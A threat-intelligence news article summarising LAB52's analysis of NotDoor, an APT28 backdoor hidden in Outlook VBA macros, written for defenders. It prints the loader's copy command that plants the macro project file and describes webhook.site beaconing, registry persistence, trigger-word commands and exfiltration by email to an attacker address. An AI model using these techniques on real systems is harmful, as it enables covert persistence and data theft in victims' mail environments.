NotDoor: A New Backdoor by Russia’s APT28 Is Hiding in Microsoft Outlook Macros

The intelligence team at LAB52 (S2 Grupo) has uncovered a sophisticated new backdoor campaign attributed to APT28, the Russian state-linked threat group also known as Fancy Bear. The malware, dubbed NotDoor, exploits Microsoft Outlook macros to create a stealthy foothold inside targeted organizations.

According to LAB52, “APT28… has compromised multiple companies from various sectors in NATO member countries.”

The backdoor was named NotDoor after the recurring word “Nothing” found within its code. It is implemented as a VBA macro for Outlook that constantly monitors incoming emails for a specific trigger word. Once the trigger is detected, the malware activates functions to exfiltrate data, upload files, or execute commands remotely.

APT28 uses a DLL side-loading technique involving the legitimate, signed Microsoft OneDrive.exe binary. The process loads a malicious DLL (SSPICLI.dll) which installs the NotDoor VBA project. To bypass security controls, it also disables multiple macro protections.

As LAB52 explains, “the backdoor will be deployed via the legitimate signed binary Microsoft OneDrive.exe… responsible for installing the VBA backdoor and disabling multiple macro security protections.”

Once executed, the loader performs three Base64-encoded PowerShell commands:

1. Copying the Backdoor: It transfers the malicious file (testtemp.ini) to Outlook’s VBA project folder, ensuring execution on startup.
   

   copy c:\programdata\testtemp.ini %APPDATA%\Microsoft\Outlook\VbaProject.OTM
2. DNS Verification: It runs an nslookup query against a webhook.site domain tied to the victim’s username to confirm infection.
3. HTTP Beaconing: It sends a curl request to a webhook.site URL as an additional validation step.

Persistence is then achieved by editing registry keys to enable macros on boot and suppress Outlook dialog messages, making detection less likely.

Once installed, NotDoor leverages Outlook events (Application_MAPILogonComplete and Application_NewMailEx) to activate whenever Outlook starts or a new email arrives. The macro code is heavily obfuscated, with randomized variable names and a custom string encoding method that disguises Base64 as fake encryption.

When triggered by a crafted email—such as one containing the phrase “Daily Report”—NotDoor deletes the message to hide traces, then parses the payload. Commands supported include:

• cmd → Execute commands and return output as attachments.
• cmdno → Execute commands without response.
• dwn → Exfiltrate files via email attachments.
• upl → Upload files to the victim’s machine.

Exfiltrated data is sent as attachments named to mimic legitimate business files such as report, invoice, contract, or photo, with extensions like .pdf, .docx, .xlsx, or .jpg.

If the %TEMP%\Temp folder contains files during startup, the malware sends them to the attacker’s ProtonMail account (a.matti444@proton[.]me) with the subject line “Re: 0”. After transmission, the files are deleted regardless of success, minimizing forensic evidence.

By embedding command-and-control inside Outlook’s trusted environment, NotDoor leverages everyday business communications to evade detection and persist across corporate networks.

Related Posts:

• Microsoft reveals some details of the Russian hacking group’s attack on Ukraine
• DarkGate Malware Resurfaces with New Campaign Tactics
• Behind the Mask: Dissecting the Latest VBA Script Cyber Espionage
• Excel File Unleashes Sophisticated Cobalt Strike Cyberattack
• APT28 Cyber Espionage Campaign Targets French Institutions Since 2021

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy